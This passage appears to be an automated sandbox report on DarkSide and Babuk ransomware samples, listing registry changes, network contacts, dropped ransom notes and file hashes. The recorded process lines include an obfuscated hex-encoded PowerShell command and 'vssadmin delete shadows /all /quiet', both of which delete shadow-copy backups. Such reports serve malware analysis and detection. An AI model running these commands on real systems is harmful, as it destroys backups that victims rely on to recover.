| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 204.11.56.48:80 | paymenthacks.com | tcp |
| US | 8.8.8.8:53 | mojobiden.com | udp |
| US | 15.197.148.33:443 | mojobiden.com | tcp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.56.11.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.148.197.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.249.124.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
| US | 15.197.148.33:80 | mojobiden.com | tcp |
| US | 204.11.56.48:443 | paymenthacks.com | tcp |
| US | 204.11.56.48:80 | paymenthacks.com | tcp |
| US | 15.197.148.33:443 | mojobiden.com | tcp |
| US | 15.197.148.33:80 | mojobiden.com | tcp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.72.42.20.in-addr.arpa | udp |
Files
memory/4484-1-0x0000000002E70000-0x0000000002E80000-memory.dmp
memory/4484-0-0x0000000002E70000-0x0000000002E80000-memory.dmp
C:\YgLqz8iqA.README.txt
| MD5 | f66968c47a64569e2281f65a95991be0 |
| SHA1 | ef9e3e80bfbea4c3021b226cb8cd00687013b8a8 |
| SHA256 | 4b950c763006e7c4569df8742855cec31bf82f835bd7e2bdcb5f128db34c82bf |
| SHA512 | cb4ace1b3e891ab100b3950c6bc133b216e91c8978a3af1ffd75617b606bb7ceb0133f44d37a30a827655e5b84b016d736a732f5f37635bb727e1a5b722cad24 |
memory/4484-227-0x0000000002E70000-0x0000000002E80000-memory.dmp
memory/4484-226-0x0000000002E70000-0x0000000002E80000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win7-20240705-en
Max time kernel
1560s
Max time network
1578s
Command Line
Signatures
DarkSide
Renames multiple (153) files with added filename extension
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\f0e1586e.BMP" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\f0e1586e.BMP" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Control Panel\Desktop\WallpaperStyle = "10" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\f0e1586e | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\f0e1586e\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\f0e1586e.ico" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.f0e1586e | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.f0e1586e\ = "f0e1586e" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\f0e1586e\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2380 wrote to memory of 1760 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2380 wrote to memory of 1760 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2380 wrote to memory of 1760 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2380 wrote to memory of 1760 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | catsdegree.com | udp |
| US | 13.248.169.48:443 | catsdegree.com | tcp |
| US | 8.8.8.8:53 | 11.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 162.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.0.127.10.in-addr.arpa | udp |
| US | 13.248.169.48:443 | catsdegree.com | tcp |
Files
memory/2380-0-0x0000000001350000-0x0000000001367000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CabC62.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarCB3.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
memory/1760-40-0x000007FEF518E000-0x000007FEF518F000-memory.dmp
memory/1760-41-0x000000001B580000-0x000000001B862000-memory.dmp
memory/1760-42-0x00000000027A0000-0x00000000027A8000-memory.dmp
memory/1760-43-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp
memory/1760-44-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp
memory/1760-45-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp
memory/1760-46-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp
memory/2380-47-0x0000000001350000-0x0000000001367000-memory.dmp
memory/1760-49-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 91a207778ee0970b4289a281bc319e08 |
| SHA1 | 7af869acec9a13181b41df5014599d0e0494f1ed |
| SHA256 | 1ced3b518f4d7b84f40fcd894713af12a97ae9732cabee15b35944b10593d224 |
| SHA512 | ee6613e6e10a06269720b6ce25e271751d45327b11b7cde4fab5161dc8e41105ba8161f8f91c98f66440800ad19a6e189219f6328b5427f24913357fe8dda4ca |
C:\Users\Admin\README.f0e1586e.TXT
| MD5 | f418a249405444da33cc73b402a26306 |
| SHA1 | 1a6c493e74036f93f0dae4b65e6c543c213ce418 |
| SHA256 | b348457b3cd38a91d113b0dfbf5bdf9d830b39f5ab849b126fff027534ef2e09 |
| SHA512 | b848dd2bb5654aac30d36279af1b9460b36c2df9c8f696d5349a870cd9be8b0aac203623c2025e8b32e646b0558ee27cf72e04db6aee3a2cd548d5c29575efaf |
memory/2380-188-0x0000000001350000-0x0000000001367000-memory.dmp
memory/2380-241-0x0000000001350000-0x0000000001367000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6c03245d5980669fa8dcb0bb5136d217 |
| SHA1 | c675715811352edf59bcb7c9204f0640d8330e81 |
| SHA256 | d9dbb21c063fc20d970eee5ede2df22b3544ab8e1fb49946639d0db814016feb |
| SHA512 | 964fe4f7d273d549d51279024839b0e617211c9db0049231bb92119357d0bee83b50a8b09424b886fe515e7b53f08cddb57672261d2aa9649d36f6a388a0e23b |
memory/2380-280-0x0000000001350000-0x0000000001367000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win7-20240508-en
Max time kernel
1561s
Max time network
1563s
Command Line
Signatures
Babuk Locker
Deletes shadow copies
Renames multiple (227) files with added filename extension
Enumerates connected drives
Enumerates physical storage devices
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
Network
Files
C:\PerfLogs\Admin\How To Restore Your Files.txt
| MD5 | 81fc4c91a0938482f65a72216cda1e39 |
| SHA1 | 3fb3d27ceb1502ddf0d68fa9251a6aec46036377 |
| SHA256 | 59ac7c1a064a53196eb135e59ab7b658577fd2ad22b45a02b77f1df630912591 |
| SHA512 | ef34299b9f48c9362fadd6da53ef4c57a5d4b3cb95e35ad5be24f51249e8bbd5a5df519065212f120897461f7360c415c20dcebd74a29221086208d8f8d6d1f4 |
Analysis: behavioral18
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win10v2004-20240704-en
Max time kernel
1714s
Max time network
1156s
Command Line
Signatures
DarkSide
Renames multiple (162) files with added filename extension
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
